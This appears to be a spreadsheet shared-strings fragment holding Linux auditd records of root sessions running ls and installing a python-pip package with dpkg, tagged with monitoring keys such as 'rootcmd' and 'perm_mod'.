  <si>
    <t>msg=audit(1584778196.099:1176):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=80 success=yes exit=0 a0=55955846ff70 a1=559558433010 a2=559558433010 a3=55955846ff71 items=1 ppid=3729 pid=3730 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="bash" exe="/bin/bash" key="power_abuse"</t>
  </si>
  <si>
    <t>msg=audit(1584778196.683:1177):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=4 success=yes exit=0 a0=559557dad873 a1=7ffe990b2340 a2=7ffe990b2340 a3=0 items=1 ppid=3729 pid=3730 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="bash" exe="/bin/bash" key="power_abuse"</t>
  </si>
  <si>
    <t>msg=audit(1584778196.683:1178):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=559558470e20 a1=559558470ea0 a2=55955846de60 a3=559558433010 items=2 ppid=3730 pid=4065 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="ls" exe="/bin/ls" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="ls" a1="--color=auto"</t>
  </si>
  <si>
    <t>proctitle=6C73002D2D636F6C6F723D6175746F</t>
  </si>
  <si>
    <t>msg=audit(1584778196.683:1179):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=561c975a44a0 a2=90800 a3=0 items=1 ppid=3730 pid=4065 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="ls" exe="/bin/ls" key="power_abuse"</t>
  </si>
  <si>
    <t>msg=audit(1584778197.859:1180):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=559558470e00 a2=90800 a3=0 items=1 ppid=3729 pid=3730 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="bash" exe="/bin/bash" key="power_abuse"</t>
  </si>
  <si>
    <t>msg=audit(1584778197.859:1181):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=4 success=yes exit=0 a0=559558470e00 a1=7ffe990b1300 a2=7ffe990b1300 a3=559558470e01 items=1 ppid=3729 pid=3730 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="bash" exe="/bin/bash" key="power_abuse"</t>
  </si>
  <si>
    <t>msg=audit(1584778198.067:1182):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=4 success=yes exit=0 a0=5595584701e0 a1=7ffe990b2270 a2=7ffe990b2270 a3=5595584701e1 items=1 ppid=3729 pid=3730 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="bash" exe="/bin/bash" key="power_abuse"</t>
  </si>
  <si>
    <t>msg=audit(1584778198.555:1183):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5595584700c0 a1=55955846e4d0 a2=55955846de60 a3=559558433010 items=2 ppid=3730 pid=4068 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="ls" exe="/bin/ls" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584778199.963:1184):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=559558470120 a1=55955846e4d0 a2=55955846de60 a3=8 items=2 ppid=3730 pid=4073 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="ls" exe="/bin/ls" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="ls" a1="--color=auto" a2="-la"</t>
  </si>
  <si>
    <t>proctitle=6C73002D2D636F6C6F723D6175746F002D6C61</t>
  </si>
  <si>
    <t>msg=audit(1584778199.963:1185):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=6 success=yes exit=0 a0=7ffe7a85b5b0 a1=563be0685c48 a2=563be0685c48 a3=0 items=1 ppid=3730 pid=4073 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="ls" exe="/bin/ls" key="power_abuse"</t>
  </si>
  <si>
    <t>msg=audit(1584778199.963:1186):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=192 success=no exit=-61 a0=7ffe7a85b5b0 a1=7f60267fcbbe a2=563be0692ad0 a3=ff items=1 ppid=3730 pid=4073 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="ls" exe="/bin/ls" key="power_abuse"</t>
  </si>
  <si>
    <t>msg=audit(1584778199.963:1187):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=191 success=no exit=-61 a0=7ffe7a85b5b0 a1=563bdf48b30b a2=0 a3=0 items=1 ppid=3730 pid=4073 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="ls" exe="/bin/ls" key="power_abuse"</t>
  </si>
  <si>
    <t>msg=audit(1584778199.963:1188):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=191 success=no exit=-61 a0=7ffe7a85b5b0 a1=563bdf48b323 a2=0 a3=0 items=1 ppid=3730 pid=4073 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="ls" exe="/bin/ls" key="power_abuse"</t>
  </si>
  <si>
    <t>msg=audit(1584778199.963:1189):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=6 success=yes exit=0 a0=7ffe7a85b5b0 a1=563be0686a58 a2=563be0686a58 a3=0 items=1 ppid=3730 pid=4073 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="ls" exe="/bin/ls" key="power_abuse"</t>
  </si>
  <si>
    <t>msg=audit(1584778199.963:1190):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=192 success=no exit=-61 a0=7ffe7a85b5b0 a1=7f60267fcbbe a2=563be0695d40 a3=ff items=1 ppid=3730 pid=4073 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="ls" exe="/bin/ls" key="power_abuse"</t>
  </si>
  <si>
    <t>msg=audit(1584778199.963:1191):</t>
  </si>
  <si>
    <t>msg=audit(1584778199.963:1192):</t>
  </si>
  <si>
    <t>msg=audit(1584778233.107:1193):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591c53d1c70 a1=5591c53d1cf0 a2=5591c53a9220 a3=5591c5395010 items=2 ppid=2175 pid=4141 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="ls" exe="/bin/ls" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584778239.111:1194):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591c53c1360 a1=5591c53d1f20 a2=5591c53a9220 a3=5591c5395010 items=2 ppid=2175 pid=4154 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="dpkg" exe="/usr/bin/dpkg" key="software_mgmt"</t>
  </si>
  <si>
    <t>argc=3 a0="dpkg" a1="-i" a2="python-pip_9.0.1-2_all.deb"</t>
  </si>
  <si>
    <t>proctitle=64706B67002D6900707974686F6E2D7069705F392E302E312D325F616C6C2E646562</t>
  </si>
  <si>
    <t>msg=audit(1584778239.243:1195):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=no exit=-2 a0=7fff9894cf20 a1=7fff9894d030 a2=5642e46b1c70 a3=1 items=1 ppid=4154 pid=4155 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="dpkg" exe="/usr/bin/dpkg" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584778239.243:1196):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.243:1197):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.243:1198):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=7fff9894cf20 a1=7fff9894d030 a2=5642e46b1c70 a3=1 items=2 ppid=4154 pid=4155 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="dpkg-split" exe="/usr/bin/dpkg-split" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="dpkg-split" a1="-Qao" a2="/var/lib/dpkg/reassemble.deb" a3="python-pip_9.0.1-2_all.deb"</t>
  </si>
  <si>
    <t>msg=audit(1584778239.263:1199):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=no exit=-2 a0=7fff9894cf20 a1=7fff9894d030 a2=5642e46b1c70 a3=1 items=1 ppid=4154 pid=4156 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="dpkg" exe="/usr/bin/dpkg" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584778239.263:1200):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.263:1201):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.263:1202):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=7fff9894cf20 a1=7fff9894d030 a2=5642e46b1c70 a3=1 items=2 ppid=4154 pid=4156 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="dpkg-deb" exe="/usr/bin/dpkg-deb" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="dpkg-deb" a1="--control" a2="python-pip_9.0.1-2_all.deb" a3="/var/lib/dpkg/tmp.ci"</t>
  </si>
  <si>
    <t>msg=audit(1584778239.307:1203):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=no exit=-2 a0=7ffccb42b410 a1=55d7f7c3b4d0 a2=7ffccb42b7e0 a3=7fab401b1e00 items=1 ppid=4156 pid=4159 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="dpkg-deb" exe="/usr/bin/dpkg-deb" key="rootcmd"</t>
  </si>
  <si>
    <t>proctitle=64706B672D646562002D2D636F6E74726F6C00707974686F6E2D7069705F392E302E312D325F616C6C2E646562002F7661722F6C69622F64706B672F746D702E6369</t>
  </si>
  <si>
    <t>msg=audit(1584778239.307:1204):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.307:1205):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.307:1206):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.307:1207):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.307:1208):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=7ffccb42b410 a1=55d7f7c3b4d0 a2=7ffccb42b7e0 a3=7fab401b1e00 items=2 ppid=4156 pid=4159 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="tar" exe="/bin/tar" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=5 a0="tar" a1="-x" a2="-f" a3="-" a4="--warning=no-timestamp"</t>
  </si>
  <si>
    <t>msg=audit(1584778239.331:1209):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=93 success=yes exit=0 a0=3 a1=0 a2=0 a3=1ff items=1 ppid=4156 pid=4159 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="tar" exe="/bin/tar" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584778239.331:1210):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=91 success=yes exit=0 a0=3 a1=1a4 a2=1a4 a3=0 items=1 ppid=4156 pid=4159 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="tar" exe="/bin/tar" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584778239.331:1211):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.331:1212):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.331:1213):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.331:1214):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=91 success=yes exit=0 a0=3 a1=1ed a2=1ed a3=0 items=1 ppid=4156 pid=4159 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="tar" exe="/bin/tar" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584778239.331:1215):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.331:1216):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.331:1217):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=260 success=yes exit=0 a0=ffffff9c a1=55cbd2b16360 a2=0 a3=0 items=1 ppid=4156 pid=4159 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="tar" exe="/bin/tar" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584778239.491:1218):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5642e4b20d90 a1=5642e4b20fb0 a2=5642e4b21250 a3=5642e46b0010 items=3 ppid=4154 pid=4160 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="python-pip.prer" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="/bin/sh" a1="/var/lib/dpkg/info/python-pip.prerm" a2="upgrade" a3="9.0.1-2"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002F7661722F6C69622F64706B672F696E666F2F707974686F6E2D7069702E707265726D007570677261646500392E302E312D32</t>
  </si>
  <si>
    <t>msg=audit(1584778239.507:1219):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55c7eab75fa0 a1=55c7eab75c68 a2=55c7eab75e88 a3=55c7eab75010 items=3 ppid=4160 pid=4161 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="which" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="/bin/sh" a1="/usr/bin/which" a2="pyclean"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002F7573722F62696E2F7768696368007079636C65616E</t>
  </si>
  <si>
    <t>msg=audit(1584778239.511:1220):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55c7eab75fd0 a1=55c7eab75c88 a2=55c7eab75eb8 a3=55c7eab75010 items=3 ppid=4160 pid=4162 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="pyclean" exe="/usr/bin/python2.7" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="/usr/bin/python2" a1="/usr/bin/pyclean" a2="-p" a3="python-pip"</t>
  </si>
  <si>
    <t>proctitle=2F7573722F62696E2F707974686F6E32002F7573722F62696E2F7079636C65616E002D7000707974686F6E2D706970</t>
  </si>
  <si>
    <t>msg=audit(1584778239.811:1221):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55d953b5a1e0 a1=55d953b3e470 a2=7fff5c7f8700 a3=55d95358a460 items=2 ppid=4162 pid=4165 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="sh" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="/bin/sh" a1="-c" a2=2F7573722F62696E2F64706B67202D4C20707974686F6E2D706970</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002D63002F7573722F62696E2F64706B67202D4C20707974686F6E2D706970</t>
  </si>
  <si>
    <t>msg=audit(1584778239.815:1222):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=557eb7002b50 a1=557eb7002bb0 a2=557eb863ea28 a3=557eb863e010 items=2 ppid=4165 pid=4166 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="dpkg" exe="/usr/bin/dpkg" key="software_mgmt"</t>
  </si>
  <si>
    <t>argc=3 a0="/usr/bin/dpkg" a1="-L" a2="python-pip"</t>
  </si>
  <si>
    <t>proctitle=2F7573722F62696E2F64706B67002D4C00707974686F6E2D706970</t>
  </si>
  <si>
    <t>msg=audit(1584778239.819:1223):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=no exit=-2 a0=7ffdaab63130 a1=55fcd4bddb80 a2=7ffdaab633f8 a3=fffffffffffffae9 items=1 ppid=4165 pid=4166 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="dpkg" exe="/usr/bin/dpkg" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584778239.819:1224):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.819:1225):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.819:1226):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=7ffdaab63130 a1=55fcd4bddb80 a2=7ffdaab633f8 a3=fffffffffffffae9 items=2 ppid=4165 pid=4166 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="dpkg-query" exe="/usr/bin/dpkg-query" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="dpkg-query" a1="--listfiles" a2="--" a3="python-pip"</t>
  </si>
  <si>
    <t>msg=audit(1584778239.975:1227):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=no exit=-2 a0=7fff9894cf20 a1=7fff9894d030 a2=5642e46b1c70 a3=1 items=1 ppid=4154 pid=4167 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="dpkg" exe="/usr/bin/dpkg" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584778239.975:1228):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.979:1229):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.979:1230):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=7fff9894cf20 a1=7fff9894d030 a2=5642e46b1c70 a3=1 items=2 ppid=4154 pid=4167 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="dpkg-deb" exe="/usr/bin/dpkg-deb" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="dpkg-deb" a1="--fsys-tarfile" a2="python-pip_9.0.1-2_all.deb"</t>
  </si>
  <si>
    <t>msg=audit(1584778239.995:1231):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=93 success=yes exit=0 a0=c a1=0 a2=0 a3=2 items=1 ppid=2175 pid=4154 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="dpkg" exe="/usr/bin/dpkg" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584778239.995:1232):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=91 success=yes exit=0 a0=c a1=1ed a2=0 a3=2 items=1 ppid=2175 pid=4154 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="dpkg" exe="/usr/bin/dpkg" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584778239.999:1233):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.999:1234):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.999:1235):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.999:1236):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=91 success=yes exit=0 a0=c a1=1a4 a2=0 a3=2 items=1 ppid=2175 pid=4154 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="dpkg" exe="/usr/bin/dpkg" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584778239.999:1237):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.999:1238):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.999:1239):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.999:1240):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.999:1241):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.999:1242):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.999:1243):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.999:1244):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.999:1245):</t>
  </si>
  <si>
    <t>msg=audit(1584778239.999:1246):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.003:1247):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.003:1248):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.003:1249):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.003:1250):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.007:1251):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.007:1252):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.007:1253):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.007:1254):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.011:1255):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.011:1256):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.011:1257):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.011:1258):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.011:1259):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.031:1260):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.031:1261):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.031:1262):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.031:1263):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.031:1264):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.031:1265):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.031:1266):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.031:1267):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.031:1268):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.035:1269):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.035:1270):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.035:1271):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.035:1272):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.035:1273):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.035:1274):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.035:1275):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.039:1276):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.039:1277):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.043:1278):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.043:1279):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.043:1280):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.043:1281):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.043:1282):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.043:1283):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.043:1284):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.043:1285):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.043:1286):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.047:1287):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.051:1288):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.051:1289):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.051:1290):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.051:1291):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.051:1292):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.051:1293):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.051:1294):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.051:1295):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.051:1296):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.051:1297):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.051:1298):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.051:1299):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.051:1300):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.055:1301):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.055:1302):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.059:1303):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.059:1304):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.059:1305):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.059:1306):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.059:1307):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.059:1308):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.059:1309):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.059:1310):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.059:1311):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.059:1312):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.059:1313):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.059:1314):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.063:1315):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.063:1316):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.063:1317):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.063:1318):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.063:1319):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.063:1320):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.063:1321):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.063:1322):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.063:1323):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.063:1324):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.063:1325):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.063:1326):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.067:1327):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.067:1328):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.067:1329):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.067:1330):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.067:1331):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.067:1332):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.067:1333):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.067:1334):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.067:1335):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.067:1336):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.067:1337):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.067:1338):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.075:1339):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.075:1340):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.075:1341):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.079:1342):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.079:1343):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.079:1344):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.079:1345):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.083:1346):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.091:1347):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.091:1348):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.091:1349):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.091:1350):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.091:1351):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.091:1352):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.095:1353):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.095:1354):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.095:1355):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.095:1356):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.095:1357):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.095:1358):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.099:1359):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.099:1360):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.099:1361):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.099:1362):</t>
  </si>
  <si>
